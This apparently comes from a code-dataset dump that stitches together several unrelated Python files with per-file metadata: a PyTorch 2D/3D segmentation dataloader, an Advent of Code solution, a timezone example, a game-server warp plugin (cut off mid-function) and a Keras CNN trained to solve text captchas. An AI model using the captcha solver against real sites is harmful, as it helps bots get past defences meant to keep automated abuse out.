assert self.use_2d(), "Dataloader does not provide 2D data."
assert retrn in ['id', 'idx']
if isinstance(_2d_identifiers, (torch.Tensor, np.ndarray)):
_2d_identifiers = _2d_identifiers.tolist()
elif not isinstance(_2d_identifiers, Iterable) or isinstance(_2d_identifiers, str):
_2d_identifiers = [_2d_identifiers]
if isinstance(_2d_identifiers[0], int):
_2d_identifiers = self.switch_2d_identifiers(_2d_identifiers)
vals = []
for item in _2d_identifiers:
_3d_id = self.extract_3d_id(item)
if retrn == 'id':
vals.append(_3d_id)
elif retrn == 'idx':
vals.append(self.switch_3d_identifiers(_3d_id))
return vals[0] if len(vals) == 1 else vals
def use_2d(self, override=None):
if not self.use_2d_normal_to:
return False
elif override is not None:
return override
else:
return True
def __len__(self, use_2d_override=None):
if self.use_2d(use_2d_override):
return len(self.img_data_2d)
return len(self.img_data_3d)
    def __getitem__(self, dataset_idx, use_2d_override=None):
        """Fetch one sample dict (image, labels, paths, id, augment grid).

        When augmentation is enabled and not deferred to collate, image and
        both labels are augmented with the SAME spatial grid; otherwise they
        are interpolated by a fixed factor of 2.
        """
        use_2d = self.use_2d(use_2d_override)
        if use_2d:
            all_ids = self.get_2d_ids()
            _id = all_ids[dataset_idx]
            image = self.img_data_2d.get(_id, torch.tensor([]))
            label = self.label_data_2d.get(_id, torch.tensor([]))

            # For 2D id cut last 4 "003rW100"
            _3d_id = self.get_3d_from_2d_identifiers(_id)
            image_path = self.img_paths[_3d_id]
            label_path = self.label_paths[_3d_id]
        else:
            all_ids = self.get_3d_ids()
            _id = all_ids[dataset_idx]
            image = self.img_data_3d.get(_id, torch.tensor([]))
            label = self.label_data_3d.get(_id, torch.tensor([]))
            image_path = self.img_paths[_id]
            label_path = self.label_paths[_id]

        spat_augment_grid = []

        # Fall back to the unmodified label when no modified one exists or
        # modified labels are disabled.
        if self.use_modified:
            if use_2d:
                modified_label = self.modified_label_data_2d.get(_id, label.detach().clone())
            else:
                modified_label = self.modified_label_data_3d.get(_id, label.detach().clone())
        else:
            modified_label = label.detach().clone()

        b_image = image.unsqueeze(0).cuda()
        b_label = label.unsqueeze(0).cuda()

        modified_label, _ = ensure_dense(modified_label)
        b_modified_label = modified_label.unsqueeze(0).cuda()

        if self.do_augment and not self.augment_at_collate:
            b_image, b_label, b_spat_augment_grid = self.augment(
                b_image, b_label, use_2d, pre_interpolation_factor=self.pre_interpolation_factor
            )
            # Re-apply the identical grid to the modified label so all three
            # tensors stay spatially aligned.
            _, b_modified_label, _ = spatial_augment(
                b_label=b_modified_label, use_2d=use_2d, b_grid_override=b_spat_augment_grid,
                pre_interpolation_factor=self.pre_interpolation_factor
            )
            spat_augment_grid = b_spat_augment_grid.squeeze(0).detach().cpu().clone()

        elif not self.do_augment:
            b_image, b_label = interpolate_sample(b_image, b_label, 2., use_2d)
            _, b_modified_label = interpolate_sample(b_label=b_modified_label, scale_factor=2.,
                use_2d=use_2d)

        image = b_image.squeeze(0).cpu()
        label = b_label.squeeze(0).cpu()
        modified_label = b_modified_label.squeeze(0).cpu()

        if use_2d:
            assert image.dim() == label.dim() == 2
        else:
            assert image.dim() == label.dim() == 3

        return {
            'image': image,
            'label': label,
            'modified_label': modified_label,
            # if disturbance is off, modified label is equals label
            'dataset_idx': dataset_idx,
            'id': _id,
            'image_path': image_path,
            'label_path': label_path,
            'spat_augment_grid': spat_augment_grid
        }
    def get_3d_item(self, _3d_dataset_idx):
        """Fetch a sample by 3D index, bypassing any active 2D view."""
        return self.__getitem__(_3d_dataset_idx, use_2d_override=False)
def get_data(self, use_2d_override=None):
if self.use_2d(use_2d_override):
img_stack = torch.stack(list(self.img_data_2d.values()), dim=0)
label_stack = torch.stack(list(self.label_data_2d.values()), dim=0)
modified_label_stack = torch.stack(list(self.modified_label_data_2d.values()), dim=0)
else:
img_stack = torch.stack(list(self.img_data_3d.values()), dim=0)
label_stack = torch.stack(list(self.label_data_3d.values()), dim=0)
modified_label_stack = torch.stack(list(self.modified_label_data_3d.values()), dim=0)
return img_stack, label_stack, modified_label_stack
    def disturb_idxs(self, all_idxs, disturbance_mode, disturbance_strength=1., use_2d_override=None):
        """Reset all modified labels, then artificially disturb those at *all_idxs*.

        Disturbance is deterministic per index (seeded with idx). Supported
        modes: FLIP_ROLL (transpose/permute + random roll) and AFFINE
        (random affine via spatial_augment). Raises ValueError otherwise.
        """
        if self.prevent_disturbance:
            warnings.warn("Disturbed idxs shall be set but disturbance is prevented for dataset.")
            return
        use_2d = self.use_2d(use_2d_override)

        if all_idxs is not None:
            if isinstance(all_idxs, (np.ndarray, torch.Tensor)):
                all_idxs = all_idxs.tolist()
            self.disturbed_idxs = all_idxs
        else:
            self.disturbed_idxs = []

        # Reset modified data
        for idx in range(self.__len__(use_2d_override=use_2d)):
            if use_2d:
                label_id = self.get_2d_ids()[idx]
                self.modified_label_data_2d[label_id] = self.label_data_2d[label_id]
            else:
                label_id = self.get_3d_ids()[idx]
                self.modified_label_data_3d[label_id] = self.label_data_3d[label_id]

            # Now apply disturbance
            if idx in self.disturbed_idxs:
                if use_2d:
                    label = self.modified_label_data_2d[label_id].detach().clone()
                else:
                    label = self.modified_label_data_3d[label_id].detach().clone()

                # Seed with the sample index so the disturbance is reproducible.
                with torch_manual_seeded(idx):
                    if str(disturbance_mode)==str(LabelDisturbanceMode.FLIP_ROLL):
                        roll_strength = 10*disturbance_strength
                        if use_2d:
                            modified_label = \
                                torch.roll(
                                    label.transpose(-2,-1),
                                    (
                                        int(torch.randn(1)*roll_strength),
                                        int(torch.randn(1)*roll_strength)
                                    ),(-2,-1)
                                )
                        else:
                            modified_label = \
                                torch.roll(
                                    label.permute(1,2,0),
                                    (
                                        int(torch.randn(1)*roll_strength),
                                        int(torch.randn(1)*roll_strength),
                                        int(torch.randn(1)*roll_strength)
                                    ),(-3,-2,-1)
                                )

                    elif str(disturbance_mode)==str(LabelDisturbanceMode.AFFINE):
                        b_modified_label = label.unsqueeze(0).cuda()
                        _, b_modified_label, _ = spatial_augment(b_label=b_modified_label, use_2d=use_2d,
                            bspline_num_ctl_points=6, bspline_strength=0., bspline_probability=0.,
                            affine_strength=0.09*disturbance_strength,
                            add_affine_translation=0.18*disturbance_strength, affine_probability=1.)
                        modified_label = b_modified_label.squeeze(0).cpu()

                    else:
                        raise ValueError(f"Disturbance mode {disturbance_mode} is not implemented.")

                if use_2d:
                    self.modified_label_data_2d[label_id] = modified_label
                else:
                    self.modified_label_data_3d[label_id] = modified_label
def train(self, augment=True, use_modified=True):
self.do_augment = augment
self.use_modified = use_modified
    def eval(self, augment=False, use_modified=False):
        """Switch to evaluation mode: both flags off by default (delegates to train)."""
        self.train(augment, use_modified)
    def set_augment_at_collate(self, augment_at_collate=True):
        """Defer augmentation to the collate function (whole-batch augmentation)."""
        self.augment_at_collate = augment_at_collate
    def get_efficient_augmentation_collate_fn(self):
        """Return a collate_fn that augments a whole batch at once on GPU.

        Augmentation only happens when both augment_at_collate and do_augment
        are set; otherwise the default collate result passes through.
        """
        use_2d = True if self.use_2d_normal_to else False

        def collate_closure(batch):
            batch = torch.utils.data._utils.collate.default_collate(batch)
            if self.augment_at_collate and self.do_augment:
                # Augment the whole batch not just one sample
                b_image = batch['image'].cuda()
                b_label = batch['label'].cuda()
                b_modified_label = batch['modified_label'].cuda()
                b_image, b_label, b_spat_augment_grid = self.augment(
                    b_image, b_label, use_2d, pre_interpolation_factor=self.pre_interpolation_factor
                )
                # Apply the identical grid to the modified label for alignment.
                _, b_modified_label, _ = spatial_augment(
                    b_label=b_modified_label, use_2d=use_2d, b_grid_override=b_spat_augment_grid,
                    pre_interpolation_factor=self.pre_interpolation_factor
                )
                b_spat_augment_grid = b_spat_augment_grid.detach().clone()
                batch['image'], batch['label'], batch['modified_label'], batch['spat_augment_grid'] = b_image, b_label, b_modified_label, b_spat_augment_grid
            return batch

        return collate_closure
def augment(self, b_image, b_label, use_2d,
noise_strength=0.05,
bspline_num_ctl_points=6, bspline_strength=0.03, bspline_probability=.95,
affine_strength=0.2, affine_probability=.45,
pre_interpolation_factor=2.):
if use_2d:
assert b_image.dim() == b_label.dim() == 3, \
f"Augmenting 2D. Input batch of image and " \
f"label should be BxHxW but are {b_image.shape} and {b_label.shape}"
else:
assert b_image.dim() == b_label.dim() == 4, \
f"Augmenting 3D. Input batch of image and " \
f"label should be BxDxHxW but are {b_image.shape} and {b_label.shape}"
b_image = augmentNoise(b_image, strength=noise_strength)
b_image, b_label, b_spat_augment_grid = spatial_augment(
b_image, b_label,
bspline_num_ctl_points=bspline_num_ctl_points, bspline_strength=bspline_strength, bspline_probability=bspline_probability,
affine_strength=affine_strength, affine_probability=affine_probability,
pre_interpolation_factor=pre_interpolation_factor, use_2d=use_2d)
b_label = b_label.long()
return b_image, b_label, b_spat_augment_grid | 45.172619 | 157 | 0.605877 | 22,415 | 0.984539 | 0 | 0 | 0 | 0 | 0 | 0 | 2,328 | 0.102253 |
2192db0d2cc72055b715c3531dbce38ec2537308 | 438 | py | Python | scripts/model_assembly/parquet_explorer.py | rsulli55/automates | 1647a8eef85c4f03086a10fa72db3b547f1a0455 | [
"Apache-2.0"
] | 17 | 2018-12-19T16:32:38.000Z | 2021-10-05T07:58:15.000Z | scripts/model_assembly/parquet_explorer.py | rsulli55/automates | 1647a8eef85c4f03086a10fa72db3b547f1a0455 | [
"Apache-2.0"
] | 183 | 2018-12-20T17:03:01.000Z | 2022-02-23T22:21:42.000Z | scripts/model_assembly/parquet_explorer.py | rsulli55/automates | 1647a8eef85c4f03086a10fa72db3b547f1a0455 | [
"Apache-2.0"
] | 5 | 2019-01-04T22:37:49.000Z | 2022-01-19T17:34:16.000Z | import sys
import json
import pandas as pd
def main():
    """Convert the parquet file named in argv[1] into a JSON file alongside it."""
    parquet_filename = sys.argv[1]
    json_filename = parquet_filename.replace(".parquet", ".json")
    print(json_filename)
    parquet_df = pd.read_parquet(parquet_filename)
    # Round-trip through to_json/loads keeps pandas' JSON-safe value encoding.
    parquet_data = json.loads(parquet_df.to_json())
    print(parquet_data)
    # BUGFIX: the original passed a bare open() to json.dump, leaking the
    # file handle; a context manager closes (and flushes) it deterministically.
    with open(json_filename, "w") as out_file:
        json.dump(parquet_data, out_file)
if __name__ == "__main__":
main()
| 20.857143 | 65 | 0.707763 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.068493 |
219394299c86acbdbecacd314e8a2cf464bd2c78 | 1,720 | py | Python | day02/main.py | aschmied/advent-of-code-2020 | 4112cebaf4dc4c6a931824da89ab894d21595673 | [
"BSD-2-Clause"
] | null | null | null | day02/main.py | aschmied/advent-of-code-2020 | 4112cebaf4dc4c6a931824da89ab894d21595673 | [
"BSD-2-Clause"
] | null | null | null | day02/main.py | aschmied/advent-of-code-2020 | 4112cebaf4dc4c6a931824da89ab894d21595673 | [
"BSD-2-Clause"
] | null | null | null | def main():
valid_passwords_by_range_policy = 0
valid_passwords_by_position_policy = 0
with open('input') as f:
for line in f:
policy_string, password = parse_line(line.strip())
policy = Policy.parse(policy_string)
if policy.is_valid_by_range_policy(password):
valid_passwords_by_range_policy += 1
if policy.is_valid_by_position_policy(password):
valid_passwords_by_position_policy += 1
print(f'There are {valid_passwords_by_range_policy} valid passwords by "range" policy.')
print(f'There are {valid_passwords_by_position_policy} valid passwords by "position" policy.')
def parse_line(line):
    """Split a "<policy>: <password>" line into its two parts.

    The password has surrounding whitespace removed; the policy text is
    returned unmodified.
    """
    policy_text, password_text = line.split(':', 1)
    return policy_text, password_text.strip()
class Policy:
    """A password policy parsed from text like "1-3 a"."""

    def __init__(self, first_number, second_number, letter):
        self._first_number = first_number
        self._second_number = second_number
        self._letter = letter

    def is_valid_by_range_policy(self, password):
        """True when the letter's occurrence count lies in [first, second]."""
        occurrences = password.count(self._letter)
        return self._first_number <= occurrences <= self._second_number

    def is_valid_by_position_policy(self, password):
        """True when exactly one of the two 1-based positions holds the letter."""
        at_first = password[self._first_number - 1] == self._letter
        at_second = password[self._second_number - 1] == self._letter
        return at_first != at_second

    @classmethod
    def parse(cls, string):
        """Build a Policy from text shaped like "<low>-<high> <letter>"."""
        pieces = string.split(' ')
        low_text, high_text = pieces[0].split('-')
        return cls(int(low_text), int(high_text), pieces[1])
if __name__ == '__main__':
main()
| 38.222222 | 98 | 0.676744 | 847 | 0.492442 | 0 | 0 | 256 | 0.148837 | 0 | 0 | 194 | 0.112791 |
21941897416bc012f80774571a8681a87ac48cad | 6,858 | py | Python | captcha_cnn/runbycolab.py | Rhysn/captcha_break | 5c2675deaff105a323a80c4631f3cf01d76ae345 | [
"MIT"
] | null | null | null | captcha_cnn/runbycolab.py | Rhysn/captcha_break | 5c2675deaff105a323a80c4631f3cf01d76ae345 | [
"MIT"
] | null | null | null | captcha_cnn/runbycolab.py | Rhysn/captcha_break | 5c2675deaff105a323a80c4631f3cf01d76ae345 | [
"MIT"
] | null | null | null | #! /usr/bin/python3
# coding:utf-8
#pip install graphic-verification-code
from captcha.image import ImageCaptcha
import random,gvcode
import numpy as np
import tensorflow as tf
number = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z']
ALPHABET = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U',
'V', 'W', 'X', 'Y', 'Z']
IMAGE_HEIGHT = 64
IMAGE_WIDTH = 128
CHAR_SET = number + alphabet + ALPHABET
CAPTCHA_SIZE = 4
def captcha_cnn():
    """Build a Keras CNN classifying each of the CAPTCHA_SIZE characters.

    Architecture: 4 stages of 2x (Conv2D -> BatchNorm -> ReLU) + MaxPool,
    with dropout after the first and last stage, then a Flatten and one
    softmax head per captcha character position.
    """
    input_tensor = tf.keras.Input(shape=(IMAGE_HEIGHT, IMAGE_WIDTH, 3))
    x = input_tensor
    for i, n in enumerate([2,2,2,2]):
        for _ in range(n):
            # NOTE(review): activation='relu' here PLUS the explicit ReLU layer
            # after BatchNorm applies ReLU twice per conv -- confirm this is
            # intended (usually the Conv2D activation would be omitted).
            x = tf.keras.layers.Conv2D(32*2**min(i, 3), kernel_size=3, padding='same', activation='relu', kernel_initializer='he_uniform')(x)
            x = tf.keras.layers.BatchNormalization()(x)
            x = tf.keras.layers.ReLU()(x)
        x = tf.keras.layers.MaxPool2D((2, 2), strides=2)(x)
        x = tf.keras.layers.Dropout(0.2)(x) if i == 0 or i == 3 else x
    x = tf.keras.layers.Flatten()(x)
    # One independent softmax classifier per character position (c1..c4).
    output_tensor = [tf.keras.layers.Dense(len(CHAR_SET), activation='softmax', name='c%d'%(i+1))(x) for i in range(CAPTCHA_SIZE)]
    model = tf.keras.Model(input_tensor, output_tensor)
    #model.summary()
    return model
class batchpic(object):
    """Generates batches of captcha images plus one-hot label arrays.

    batch_type 'train_data' renders with captcha.ImageCaptcha; any other
    value renders with gvcode (used as a different-looking validation set).
    """
    def __init__(self, char_set, batch_size, captcha_size, batch_type='train_data'):
        self.char_set = ''.join(char_set)
        self.batch_size = batch_size
        self.captcha_size = captcha_size
        self.captchalist = self._random_captcha_list()
        self.batch_type = batch_type

    def _random_captcha_list(self):
        """Draw batch_size UNIQUE random captcha strings from the char set."""
        captcha = set()
        while len(captcha) < self.batch_size:
            random_str = ''.join([random.choice(self.char_set) for j in range(self.captcha_size)])
            captcha.add(random_str)
        return list(captcha)

    def _createpicbyImageCaptcha(self, chars):
        """Render *chars* with the captcha library; returns (PIL image, chars)."""
        generator=ImageCaptcha(width=IMAGE_WIDTH,height=IMAGE_HEIGHT)
        img = generator.generate_image(chars)
        return img, chars

    def _createpicbygvcode(self):
        """Render a random captcha with gvcode; returns (image, text)."""
        return gvcode.generate(size=(IMAGE_WIDTH,IMAGE_HEIGHT))

    def getpatches(self):
        """Return (batch_x, batch_y): normalized images and per-position one-hots.

        batch_x: (batch, H, W, 3) floats in [0, 1].
        batch_y: list of captcha_size arrays, each (batch, len(char_set)) one-hot.
        """
        batch_x = np.zeros((self.batch_size, IMAGE_HEIGHT, IMAGE_WIDTH, 3))
        batch_y = [np.zeros((self.batch_size, len(self.char_set)), dtype=np.uint8) for i in range(self.captcha_size)]
        for i in range(self.batch_size):
            if self.batch_type == 'train_data':
                x, y = self._createpicbyImageCaptcha(self.captchalist[i])
            else:
                x, y = self._createpicbygvcode()
            # Convert PIL image to float tensor and scale to [0, 1].
            x = np.array(x, 'd')
            x = tf.convert_to_tensor(x)
            x /= 255.
            x = tf.reshape(x, (IMAGE_HEIGHT, IMAGE_WIDTH, 3))
            batch_x[i, :] = x
            # One-hot encode each character at its position head.
            for j, ch in enumerate(y):
                batch_y[j][i, :] = 0
                batch_y[j][i, self.char_set.index(ch)] = 1
        return batch_x, batch_y

    def vec2text(self, vec):
        """Decode argmax index vectors (one per position) back into a string."""
        text = []
        for item in vec:
            index = item[0]
            text.append(self.char_set[index])
        return ''.join(text)
class TrainAndPredict(object):
    """Wraps model construction, checkpoint loading, training and evaluation."""

    def __init__(self, modelpath, batch_size, charset, captcha_size, epochs):
        self.model = captcha_cnn()
        self.modelpath = modelpath
        try:
            # Resume from the best checkpoint with a lower learning rate;
            # fall back to a fresh compile at 1e-3 when loading fails.
            self.model.load_weights(self.modelpath + 'captcha_cnn_best.h5')
            self.model.compile(optimizer=tf.keras.optimizers.Adam(1e-4, amsgrad=True),
                loss='categorical_crossentropy',
                metrics=['accuracy'])
        except Exception as identifier:
            print(identifier)
            self.model.compile(optimizer=tf.keras.optimizers.Adam(1e-3, amsgrad=True),
                loss='categorical_crossentropy',
                metrics=['accuracy'])
        # Early stopping, CSV logging, and best-only checkpointing.
        self.callbacks = [tf.keras.callbacks.EarlyStopping(patience=3),
            tf.keras.callbacks.CSVLogger(self.modelpath + 'log/captcha_cnn.csv', append=True),
            tf.keras.callbacks.ModelCheckpoint(self.modelpath + 'captcha_cnn_best.h5', save_best_only=True)]
        self.batch_size = batch_size
        self.charset = charset
        self.captcha_size = captcha_size
        self.epochs = epochs

    def train(self, times):
        """Run one fit() round on freshly generated data; evaluate every 100 calls."""
        #train_type = 'train_data' if times % 2 == 0 else 'diff_data'
        train_type = 'train_data'
        train_data = batchpic(self.charset, self.batch_size, self.captcha_size, train_type)
        validation_data = batchpic(self.charset, 100, self.captcha_size, train_type)
        train_images, train_labels = train_data.getpatches()
        test_images, test_labels = validation_data.getpatches()
        self.model.fit(train_images, train_labels, epochs=self.epochs,
            validation_data=(test_images, test_labels), workers=4, use_multiprocessing=True,
            callbacks=self.callbacks)
        if times % 100 == 0:
            print('times:', times)
            self.predict()

    def predict(self):
        """Measure whole-captcha accuracy (case-insensitive) on 100 samples each
        of captcha-library images and gvcode images, and print both rates."""
        success, succ, count = 0, 0, 100
        print('ing...')
        for _ in range(count):
            test_data = batchpic(self.charset, 1, self.captcha_size)
            data_x, data_y = test_data.getpatches()
            prediction_value = self.model.predict(data_x)
            data_y = test_data.vec2text(np.argmax(data_y, axis=2))
            prediction_value = test_data.vec2text(np.argmax(prediction_value, axis=2))
            success += 1 if data_y.upper() == prediction_value.upper() else 0
            ########################
            diff_test_data = batchpic(self.charset, 1, self.captcha_size, 'diff_data')
            diff_data_x, diff_data_y = diff_test_data.getpatches()
            diff_prediction_value = self.model.predict(diff_data_x)
            diff_data_y = diff_test_data.vec2text(np.argmax(diff_data_y, axis=2))
            diff_prediction_value = diff_test_data.vec2text(np.argmax(diff_prediction_value, axis=2))
            succ += 1 if diff_data_y.upper() == diff_prediction_value.upper() else 0
        print('captcha 数据(', count, '次)预测', '成功率 :{:5.2%}'.format(success / count))
        print('gvcode 数据(', count, '次)预测', '成功率 :{:5.2%}'.format(succ / count))
if __name__ == '__main__':
MODEL_PATH = "/content/drive/APP/keras_cnn/"
#MODEL_PATH = './keras_cnn/'
BATCH_SIZE = 1024
EPOCHS = 100
cacnn = TrainAndPredict(MODEL_PATH, BATCH_SIZE, CHAR_SET, CAPTCHA_SIZE, EPOCHS)
for i in range(1000):
print('times:', i)
cacnn.train(i)
cacnn.predict() | 37.681319 | 141 | 0.594051 | 5,100 | 0.739774 | 0 | 0 | 0 | 0 | 0 | 0 | 781 | 0.113287 |
2194785ae66285d905bdd54bde253e59e60bc9d5 | 1,476 | py | Python | progs/PyEpoch-master/PyEpoch-master/example.py | am-3/TimeZoned | e8ae2e90c2d6addf13b145aa2a4c7a9a66c1346e | [
"MIT"
] | null | null | null | progs/PyEpoch-master/PyEpoch-master/example.py | am-3/TimeZoned | e8ae2e90c2d6addf13b145aa2a4c7a9a66c1346e | [
"MIT"
] | null | null | null | progs/PyEpoch-master/PyEpoch-master/example.py | am-3/TimeZoned | e8ae2e90c2d6addf13b145aa2a4c7a9a66c1346e | [
"MIT"
] | null | null | null | # PyEpoch Module Example File.
import pyepoch
# -- TODAY() --
# The today() function returns today's date.
today = pyepoch.today()
print("Today's date & time:")
print(today)
# -- TIMEZONE() --
# The timezone() function returns a date with a different timezone.
# timezone() takes two(2) arguments:
# - date = a date to be converted.
# - tz = the timezone to convert to (ex. 'US/Pacific').
today_pst = pyepoch.timezone(today, 'US/Pacific')
print('Today\'s date & time in Pacific time:')
print(today_pst)
# -- TIMEZONE_SET() --
# The timezone_set() function returns a date with a different timezone and new hour/minute/second values.
# timezone_set() takes five(5) arguments:
# - date = a date to be converted.
# - tz = the timezone to convert to (ex. 'US/Pacific').
# - h = hour, changes the hour of the output.
# - m = minute, changes the minute of the output.
# - s = second, changes the second(s) of the output.
time = pyepoch.timezone_set(today, 'US/Pacific', 8, 0, 0)
print('Today\'s date at 8 o\'clock Pacific time: ')
print(time)
# -- EPOCH_SEC() --
# The PyEpoch_sec() function returns the number of seconds since the UNIX epoch (1970, 1, 1) up to the provided date.
# timezone_set() takes two(2) arguments:
# - date = a date to be converted.
# - tz = the timezone as a string, (ex. 'US/Pacific').
sec = pyepoch.epoch_sec(today_pst, 'US/Pacific')
print('Todays\'s date & time in Pacific time as seconds since the Unix epoch: ')
print(sec)
| 31.404255 | 117 | 0.680217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,198 | 0.811653 |
2195d746a275485f7b8e060e078812f4fd92ce29 | 9,615 | py | Python | plugins.disable/warpy_plugin/warpy_plugin.py | StarryPy/StarryPy-Historic | b9dbd552b8c4631a5a8e9dda98b7ba447eca59da | [
"WTFPL"
] | 38 | 2015-02-12T11:57:59.000Z | 2018-11-15T16:03:45.000Z | plugins.disable/warpy_plugin/warpy_plugin.py | StarryPy/StarryPy-Historic | b9dbd552b8c4631a5a8e9dda98b7ba447eca59da | [
"WTFPL"
] | 68 | 2015-02-05T23:29:47.000Z | 2017-12-27T08:26:25.000Z | plugins.disable/warpy_plugin/warpy_plugin.py | StarryPy/StarryPy-Historic | b9dbd552b8c4631a5a8e9dda98b7ba447eca59da | [
"WTFPL"
] | 21 | 2015-02-06T18:58:21.000Z | 2017-12-24T20:08:59.000Z | # -*- coding: UTF-8 -*-
from base_plugin import SimpleCommandPlugin
from plugins.core.player_manager_plugin import permissions, UserLevels
from utility_functions import build_packet, move_ship_to_coords, extract_name
from packets import (
Packets,
WarpAliasType,
WarpWorldType,
WarpActionType,
player_warp,
player_warp_toworld_write,
player_warp_toplayer_write,
player_warp_toalias_write,
fly_ship,
fly_ship_write
)
class Warpy(SimpleCommandPlugin):
    """
    Plugin that allows privileged players to warp around as they like.

    Commands:
        /warp [player] (to player)      - warp yourself to a player, or one
                                          player to another player.
        /warp_ship [player] (to player) - fly your own ship (or another
                                          player's ship) to a player's planet.
        /outpost [player]               - warp yourself (or another player)
                                          to the outpost.
    """
    name = 'warpy_plugin'
    depends = ['command_plugin', 'player_manager_plugin']
    commands = ['warp', 'warp_ship', 'outpost']

    def activate(self):
        super(Warpy, self).activate()
        # Shared player manager used to resolve player names to sessions.
        self.player_manager = self.plugins[
            'player_manager_plugin'
        ].player_manager

    @permissions(UserLevels.MODERATOR)
    def warp(self, name):
        """
        Warps you to a player's ship (or player to player).
        Syntax: /warp [player] (to player)
        """
        # BUGFIX: the guard was inverted ('if name:'), which printed the
        # usage text whenever an argument WAS supplied and tried to parse an
        # empty argument otherwise.
        if not name:
            self.protocol.send_chat_message(self.warp.__doc__)
            return
        try:
            first_name, rest = extract_name(name)
        except ValueError as e:
            self.protocol.send_chat_message(str(e))
            return
        if not rest:
            # Only one name given: warp the caller to that player.
            self.warp_self_to_player([first_name])
        else:
            try:
                second_name = extract_name(rest)[0]
            except ValueError as e:
                self.protocol.send_chat_message(str(e))
                return
            self.warp_player_to_player(first_name, second_name)

    @permissions(UserLevels.ADMIN)
    def warp_ship(self, location):
        """
        Warps a player ship to another players ship.
        Syntax: /warp_ship [player] (to player)
        """
        # BUGFIX: guard was inverted ('if location:'); see warp() above.
        if not location:
            self.protocol.send_chat_message(self.warp_ship.__doc__)
            return
        try:
            first_name, rest = extract_name(location)
        except ValueError as e:
            self.protocol.send_chat_message(str(e))
            return
        if not rest:
            # Only one name given: move the caller's own ship to that player.
            self.move_own_ship_to_player(first_name)
        else:
            try:
                second_name = extract_name(rest)[0]
            except ValueError as e:
                self.protocol.send_chat_message(str(e))
                return
            self.move_player_ship_to_other(first_name, second_name)

    @permissions(UserLevels.MODERATOR)
    def outpost(self, name):
        """
        Warps you (or another player) to the outpost.
        Syntax: /outpost [player]
        """
        # BUGFIX: the branches were swapped - a supplied target name was
        # ignored (the caller was warped instead) and an empty argument was
        # handed to extract_name().
        if not name:
            self.warp_player_to_outpost(self.protocol.player.name)
        else:
            try:
                player_name, rest = extract_name(name)
            except ValueError as e:
                self.protocol.send_chat_message(str(e))
                return
            self.warp_player_to_outpost(player_name)

    def warp_self_to_player(self, name):
        """Warp the calling player to the named player (name is a word list)."""
        self.logger.debug(
            'Warp command called by %s to %s', self.protocol.player.name, name
        )
        name = ' '.join(name)
        self.warp_player_to_player(self.protocol.player.name, name)

    def warp_player_to_player(self, from_string, to_string):
        """Warp one logged-in player to another (or to their own ship)."""
        self.logger.debug(
            'Warp player-to-player command called by %s: %s to %s',
            self.protocol.player.name, from_string, to_string
        )
        from_player = self.player_manager.get_logged_in_by_name(from_string)
        to_player = self.player_manager.get_logged_in_by_name(to_string)
        if from_player is not None:
            if to_player is not None:
                from_protocol = self.factory.protocols[from_player.protocol]
                if from_player is not to_player:
                    self.logger.debug('target: %s', to_player.uuid)
                    warp_packet = build_packet(
                        Packets.PLAYER_WARP,
                        player_warp_toplayer_write(uuid=to_player.uuid)
                    )
                else:
                    # Warping a player to themselves sends them to their ship.
                    warp_packet = build_packet(
                        Packets.PLAYER_WARP,
                        player_warp_toalias_write(alias=WarpAliasType.SHIP)
                    )
                from_protocol.client_protocol.transport.write(warp_packet)
                if from_string != to_string:
                    self.protocol.send_chat_message(
                        'Warped ^yellow;{}^green;'
                        ' to ^yellow;{}^green;.'.format(from_string, to_string)
                    )
                else:
                    self.protocol.send_chat_message(
                        'Warped to ^yellow;{}^green;.'.format(to_string)
                    )
            else:
                self.protocol.send_chat_message(
                    'No player by the name ^yellow;{}^green; found.'.format(
                        to_string
                    )
                )
                self.protocol.send_chat_message(self.warp.__doc__)
                return
        else:
            # BUGFIX: the error message previously formatted the (None)
            # to_player object instead of the name that failed to resolve.
            self.protocol.send_chat_message(
                'No player by the name ^yellow;{}^green; found.'.format(
                    from_string
                )
            )
            self.protocol.send_chat_message(self.warp.__doc__)

    def move_player_ship(self, protocol, location):
        """Fly the ship owned by `protocol` to the given planet coordinates.

        `location` is the tracked planet string split on ':'; the trailing
        elements are x, y, z, planet and an optional satellite index.
        NOTE(review): with exactly five parts the leading element is ignored
        and satellite defaults to 0 - confirm against the planet format.
        """
        if len(location) < 5:
            self.logger.warning(
                'Couldn\'t derive a warp location in move_player_ship. '
                'Coordinates given: ^cyan;%s',
                ':'.join(location)
            )
            self.protocol.send_chat_message('Sorry, an error occurred.')
            return
        if len(location) == 5:
            satellite = 0
        else:
            satellite = int(location.pop())
        planet = int(location.pop())
        z = int(location.pop())
        y = int(location.pop())
        x = int(location.pop())
        move_ship_to_coords(protocol, x, y, z, planet, satellite)

    def move_own_ship_to_player(self, player_name):
        """Fly the caller's own ship to the named player's tracked planet."""
        t = self.player_manager.get_logged_in_by_name(player_name)
        if t is None:
            self.protocol.send_chat_message(
                'No player by the name ^yellow;{}^green; found.'.format(
                    player_name
                )
            )
            self.protocol.send_chat_message(self.warp.__doc__)
            return
        if not t.planet:
            # We only know a player's planet after they warp down to one.
            self.protocol.send_chat_message(
                'Sorry, we don\'t have a tracked planet location for '
                '^yellow;{}^green;. Perhaps they haven\'t warped down '
                'to a planet since logging in?'.format(t.name)
            )
            return
        self.move_player_ship(self.protocol, t.planet.split(':'))
        self.protocol.send_chat_message(
            'Warp drive engaged. Warping to ^yellow;{}^green;.'.format(
                player_name
            )
        )

    def move_player_ship_to_other(self, from_player, to_player):
        """Fly one player's ship to another player's tracked planet."""
        f = self.player_manager.get_logged_in_by_name(from_player)
        t = self.player_manager.get_logged_in_by_name(to_player)
        if f is None:
            self.protocol.send_chat_message(
                'No player by the name ^yellow;{}^green; found.'.format(
                    from_player
                )
            )
            self.protocol.send_chat_message(self.warp.__doc__)
            return
        if t is None:
            self.protocol.send_chat_message(
                'No player by the name ^yellow;{}^green; found.'.format(
                    to_player
                )
            )
            self.protocol.send_chat_message(self.warp.__doc__)
            return
        if not t.planet:
            self.protocol.send_chat_message(
                'Sorry, we don\'t have a tracked planet location for {}. '
                'Perhaps they haven\'t warped to'
                ' a planet since logging in?'.format(to_player)
            )
